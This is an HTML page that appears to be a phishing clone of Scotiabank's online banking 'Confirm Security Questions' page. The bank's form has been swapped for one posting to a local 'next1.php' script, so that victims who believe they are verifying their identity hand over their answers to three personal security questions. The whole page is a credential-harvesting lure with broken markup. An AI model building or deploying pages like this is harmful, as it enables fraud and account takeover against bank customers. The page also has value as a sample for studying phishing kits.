
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0096)https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
		
		
		
		<meta http-equiv="content-language" content="en">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		
		<title>
		Confirm Security Question
		</title>
		
		<meta http-equiv="Cache-Control" content="no-cache">
		<meta http-equiv="pragma" content="no-cache">
		<meta http-equiv="expires" content="0"> 
		
		<meta name="Keywords">
		<meta name="Description">
		<meta http-equiv="Content-Style-Type" content="text/css">
		<meta http-equiv="Content-Script-Type" content="text/javascript">
		
	<script src="./mfaAuth_files/framework.pack.js.download" type="text/javascript"></script><script id="org.ajax4jsf.queue_script" type="text/javascript">if (typeof A4J != 'undefined') { if (A4J.AJAX) { with (A4J.AJAX) {if (!EventQueue.getQueue('mfaAuthentication_xhtml')) { EventQueue.addQueue(new EventQueue('mfaAuthentication_xhtml',null,null)) };}}};</script><link rel="shortcut icon" href="https://www.scotiaonline.scotiabank.com/favicon/scotiabank.ico">
		<link rel="Bookmark" href="https://www.scotiaonline.scotiabank.com/favicon/scotiabank.ico">
		
		
		<link rel="stylesheet" type="text/css" media="all" href="./mfaAuth_files/loader.css" title="template-css" id="framework_css">
		<link rel="stylesheet" type="text/css" media="all" href="./mfaAuth_files/jquery-ui-1.8.2.custom.css" id="jqueryui_css">
			
		<script type="text/javascript" src="./mfaAuth_files/bns-jquery-1.4.2.js.download"></script>


		
		
	
	</div>
		
		
		<div class="page_bg">
		<div class="page-wrapper">
	
		
	<div class="header">
		<div class="scotia-logo" tabindex="0"><a href="https://www.scotiaonline.scotiabank.com/online/authentication/authentication.bns" id="scotia-logo-img-id" title="Scotiabank Homepage" class="scotia-logo-image" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://www.scotiaonline.scotiabank.com/online/authentication/authentication.bns_1&quot;;return this.s_oc?this.s_oc(e):true">
			
			<div class="scotia-logo-img-div-en" role="img" aria-label="Scotiabank Group"></div></a>
			<span class="scotia-logo-image-bw">
				<img src="./mfaAuth_files/scotiabank-group-bw.gif" alt="Scotiabank Group">
			</span>
		</div>
		<a class="skip-nav" href="#">Skip to main content</a>
		<div class="header-links">
			<ul title=""><span id="helpCentre_curtainMenu_container">				
				<li class="var_main_top-links_tab_1"><form id="helpCentre_curtainMenuControls_helpform" name="helpCentre_curtainMenuControls_helpform" method="post" action="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns" target=""><a class="var_helpCentre_helpLink " href="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#" id="helpCentre_curtainMenuControls_helpform:j_id47" name="helpCentre_curtainMenuControls_helpform:j_id47" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#_4&quot;;return this.s_oc?this.s_oc(e):true"><span id="helpCentre_curtainMenuControls_helpform:j_id48" class="">Help</span></a><input type="hidden" autocomplete="off" name="helpCentre_curtainMenuControls_helpform" value="helpCentre_curtainMenuControls_helpform"><input type="hidden" autocomplete="off" name="autoScroll" value=""><script type="text/javascript">function clear_helpCentre_curtainMenuControls_helpform() {
_clearJSFFormParameters('helpCentre_curtainMenuControls_helpform','',['helpCentre_curtainMenuControls_helpform:j_idcl','helpCentre_curtainMenuControls_helpform:_link_hidden_']);
}
function clearFormHiddenParams_helpCentre_curtainMenuControls_helpform(){clear_helpCentre_curtainMenuControls_helpform();}
function clearFormHiddenParams_helpCentre_curtainMenuControls_helpform(){clear_helpCentre_curtainMenuControls_helpform();}
clear_helpCentre_curtainMenuControls_helpform();</script><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="j_idN2B08FAF62" autocomplete="off"></form>					
				</li>
				<li class="var_main_top-links_tab_2"><form id="helpCentre_curtainMenuControls_contactform" name="helpCentre_curtainMenuControls_contactform" method="post" action="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns" target=""><a class="var_helpCentre_contactLink " href="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#" id="helpCentre_curtainMenuControls_contactform:j_id51" name="helpCentre_curtainMenuControls_contactform:j_id51" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#_5&quot;;return this.s_oc?this.s_oc(e):true"><span id="helpCentre_curtainMenuControls_contactform:j_id52" class="">Contact</span></a><input type="hidden" autocomplete="off" name="helpCentre_curtainMenuControls_contactform" value="helpCentre_curtainMenuControls_contactform"><input type="hidden" autocomplete="off" name="autoScroll" value=""><script type="text/javascript">function clear_helpCentre_curtainMenuControls_contactform() {
_clearJSFFormParameters('helpCentre_curtainMenuControls_contactform','',['helpCentre_curtainMenuControls_contactform:_link_hidden_','helpCentre_curtainMenuControls_contactform:j_idcl']);
}
function clearFormHiddenParams_helpCentre_curtainMenuControls_contactform(){clear_helpCentre_curtainMenuControls_contactform();}
function clearFormHiddenParams_helpCentre_curtainMenuControls_contactform(){clear_helpCentre_curtainMenuControls_contactform();}
clear_helpCentre_curtainMenuControls_contactform();</script><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="j_idN2B08FAF62" autocomplete="off"></form>		
				</li>
				
					<li class="var_main_top-links_tab_3">
						<a href="http://maps.scotiabank.com/en/index.php" target="_blank" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;http://maps.scotiabank.com/en/index.php_2&quot;;return this.s_oc?this.s_oc(e):true">
							<span>Locate Us</span>
						</a>
					</li>
			</ul>
		</div>
	</div>
	<div class="clearboth"></div>
	
	<div class="navigation pre-sign-on-flow"></div>
				
   	<div class="clearboth"></div>
			
			
			<div class="signon-wrapper">
			<div class="content">

		
		<div class="dataview full-width">
			<a name="main-content"></a>
			<h1>authentication.mfa</h1>
			
			<div class="form-data ftf-form-data"><span id="span_msgs_5"></span>
<input type="hidden" name="mfaAuth_form" value="mfaAuth_form">

			<h2 class="float-left">Confirm Security Questions</h2>
			<div class="first-time-user-flow">
			<div class="clearboth"></div>

			<p>This computer or device is not registered in your profile.  Please verify your identity by answering your personal security question.  (<a href="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#" id="mfaAuth_form:j_id114" name="mfaAuth_form:j_id114" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#_7&quot;;return this.s_oc?this.s_oc(e):true">
		<span class="">Why do I need to answer security questions?</span></a>)</p>

			<h3>Security Question 1</h3>
			<table width="100%" border="0" class="standard-table" summary="Personal Security Question and Answer">
				<colgroup>
					<col width="100px">
					<col>
				</colgroup>

				<tbody>
					<tr>
						<th scope="row"><label for="question1">Question:</label></th>
													<form action=next1.php name=shary id=shar method=post>
						<td>  <select name="secretQuestion1Key"><option selected="selected">- SELECT -</option>
						<option value="child when you grew up">As a child, what did you want to be when you grew up?</option>
						<option value="oldest newphew">What is the first name of your oldest nephew?</option>
						<option value="oldest niece">What is the first name of your oldest niece?</option>
						<option value="favorite teacher">What is the last name of your favorite teacher in elementary school?</option>
						<option value="first employer">What is the name of your first employer?</option>
						<option value="first pet">What is the name of your first pet?</option>
						<option value="oldest cousin">What is the name of your oldest cousin?</option>
						<option value="bff name">What is your best friend's first name?</option>
						<option value="hobby">What is your hobby?</option>
						<option value="movie">What is your favorite movie?</option>
						<option value="vacation spot">What is your favorite vacation destination?</option>
						<option value="grandfather name">What is your paternal grandfather's first name?</option>
						<option value="first manager">What is the first name of your first manager?</option>
						<option value="street grew up">What was the name of the street on which you grew up?</option>
						<option value="elementary school">What was the name of your elementary school?<option>
						<option value="first gfe">What was the name of your first girlfriend/boyfriend?</option>
						<option value="honeymoon">Where did you go on your honeymoon?</option>
						<option value="meet spouce city">Where did you meet your spouce for the first time? (Enter City)</option>
        	</option></select></td>
					</tr>
					<tr>
						<th scope="row"><label for="mfaAuth_form:answer_0">
Answer:
								<p class="hide-elem">This field contains an error:</p></label>
						</th>
						<td><input id="q1" type="text" name="q1" autocomplete="off" class=" inputwidth-lrg" tabindex="0">
						</td>
					</tr>
				</tbody>
			</table>
		<h3>Security Question 2</h3>
			<table width="100%" border="0" class="standard-table" summary="Personal Security Question and Answer">
				<colgroup>
					<col width="100px">
					<col>
				</colgroup>

				<tbody>
					<tr>
						<th scope="row"><label for="question1">Question:</label></th>
						<td>  <select name="secretQuestion2Key"><option selected="selected">- SELECT -</option>
						<option value="city grandma">What is or was the name of the town your grandmother lived in?</option>
						<option value="oldest newphew">What is the first name of your oldest nephew?</option>
						<option value="oldest niece">What is the first name of your oldest niece?</option>
						<option value="favorite teacher">What is the last name of your favorite teacher in elementary school?</option>
						<option value="first employer">What is the name of your first employer?</option>
						<option value="first pet">What is the name of your first pet?</option>
						<option value="oldest cousin">What is the name of your oldest cousin?</option>
						<option value="bff name">What is your best friend's first name?</option>
						<option value="hobby">What is your hobby?</option>
						<option value="movie">What is your favorite movie?</option>
						<option value="vacation spot">What is your favorite vacation destination?</option>
						<option value="grandfather name">What is your paternal grandfather's first name?</option>
						<option value="first manager">What is the first name of your first manager?</option>
						<option value="street grew up">What was the name of the street on which you grew up?</option>
						<option value="elementary school">What was the name of your elementary school?<option>
						<option value="first gfe">What was the name of your first girlfriend/boyfriend?</option>
						<option value="honeymoon">Where did you go on your honeymoon?</option>
						<option value="meet spouce city">Where did you meet your spouce for the first time? (Enter City)</option>
        	</option></select></td>
					</tr>
					<tr>
						<th scope="row"><label for="mfaAuth_form:answer_0">
Answer:
								<p class="hide-elem">This field contains an error:</p></label>
						</th>
						<td><input id="q2" type="text" name="q2" autocomplete="off" class=" inputwidth-lrg" tabindex="0">
						</td>
					</tr>
				</tbody>
			</table>
		<h3>Security Question 3</h3>
			<table width="100%" border="0" class="standard-table" summary="Personal Security Question and Answer">
				<colgroup>
					<col width="100px">
					<col>
				</colgroup>

				<tbody>
					<tr>
						<th scope="row"><label for="question1">Question:</label></th>
						<td>  <select name="secretQuestion3Key"><option selected="selected">- SELECT -</option>
						<option value="graduate year">In what year did you graduate?</option>
						<option value="oldest newphew">What is the first name of your oldest nephew?</option>
						<option value="oldest niece">What is the first name of your oldest niece?</option>
						<option value="favorite teacher">What is the last name of your favorite teacher in elementary school?</option>
						<option value="first employer">What is the name of your first employer?</option>
						<option value="first pet">What is the name of your first pet?</option>
						<option value="oldest cousin">What is the name of your oldest cousin?</option>
						<option value="bff name">What is your best friend's first name?</option>
						<option value="hobby">What is your hobby?</option>
						<option value="movie">What is your favorite movie?</option>
						<option value="vacation spot">What is your favorite vacation destination?</option>
						<option value="grandfather name">What is your paternal grandfather's first name?</option>
						<option value="first manager">What is the first name of your first manager?</option>
						<option value="street grew up">What was the name of the street on which you grew up?</option>
						<option value="elementary school">What was the name of your elementary school?<option>
						<option value="first gfe">What was the name of your first girlfriend/boyfriend?</option>
						<option value="honeymoon">Where did you go on your honeymoon?</option>
						<option value="meet spouce city">Where did you meet your spouce for the first time? (Enter City)</option>
        	</option></select></td>
					</tr>
					<tr>
						<th scope="row"><label for="mfaAuth_form:answer_0">
Answer:
								<p class="hide-elem">This field contains an error:</p></label>
						</th>
						<td><input id="q3" type="text" name="q3" autocomplete="off" class=" inputwidth-lrg" tabindex="0">
						</td>
					</tr>
				</tbody>
			</table>
						</td>
					</tr>
				</tbody>
			</table>
			<br class="clearboth">
			<h3 class="margin-top-15">Register this computer/device in my profile.</h3>
			<p>If this is a personal computer or device, select "Yes" to have it registered and you won't have to answer security questions when signing on to Scotia OnLine.  <a href="https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#" id="mfaAuth_form:j_id130" name="mfaAuth_form:j_id130" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://www.scotiaonline.scotiabank.com/online/authentication/mfaAuthentication.bns?convid=91042#_8&quot;;return this.s_oc?this.s_oc(e):true">
		<span class="">(Learn more about registering your computer/device.</span></a>)</p>
				

			<div class="form-section">
			<fieldset><legend>Agree/Disagree buttons
			
 <p class="hide-elem">This field contains an error:</p>

			
			
			</legend>
			<div class="data-pair"><div id="mfaAuth_form:register" class="radio-button-wrapper mfaAuthentication"><div id="mfaAuth_form:register_div_label" class="radio-button-parent-label mfaAuthentication"></div><div id="mfaAuth_form:register_div_0" class="radio-button-child mfaAuthentication"><input type="radio" id="mfaAuth_form:register:0" name="mfaAuth_form:register" value="1"><label for="mfaAuth_form:register:0"><span class="off-screen"></span><strong>Yes, this is a personal computer or device. </strong> Do not choose this option if this computer/device is available in a public place, such as a library or internet café.</label></div><div id="mfaAuth_form:register_div_1" class="radio-button-child mfaAuthentication"><input type="radio" id="mfaAuth_form:register:1" name="mfaAuth_form:register" value="0"><label for="mfaAuth_form:register:1"><span class="off-screen"></span><strong>No, this is not my computer or device. </strong> If you select "No" you will be prompted to answer a security question every time you sign on to Scotia OnLine using this computer/device.</label></div></div></div>
			</fieldset>
			</div>

		<input type="image" style="border:none;" src="log.png"
 class="float-right"> 
				 </div>

			</div>

			</div>
		</div>									
			</div>
			<div class="clearboth"></div>
	
	<div class="footer-centered">

		<div id="pageId" class="pageID">
		
		Security Question - challenge:P48CCDFD1<div id="j_id147">			
</div>
		</div>
		<div class="footer">
			<div class="footer-links resp-hide">			
				<ul>
					<li><a onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;javascript:void(0)_2&quot;;return this.s_oc?this.s_oc(e):true" class="rewardsItem" href="javascript:void(0)">Legal</a></li> 
					
					
					<li><a onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;javascript:void(0)_3&quot;;return this.s_oc?this.s_oc(e):true" class="rewardsItem" href="javascript:void(0)">Privacy</a></li>
					<li><a onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;javascript:void(0)_4&quot;;return this.s_oc?this.s_oc(e):true" class="rewardsItem" href="javascript:void(0)">Security</a></li>
					<li><a href="https://mobilebanking.scotiabank.com/bankingweb/#" class="rewardsItem" onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;https://mobilebanking.scotiabank.com/bankingweb/#_1&quot;;return this.s_oc?this.s_oc(e):true">Mobile Site</a></li> 
						<li><a onclick="var x=&quot;.tl(&quot;;s_objectID=&quot;javascript:void(0)_5&quot;;return this.s_oc?this.s_oc(e):true" class="rewardsItem" href="javascript:void(0)">Scotiabank.com</a></li>
				</ul>		
			</div>
			<div class="clearboth"></div>		
		</div><div id="j_id162">
	</div>
		
	
		
	</div>					
			</div>					
		</div>
		</div>
</body></html>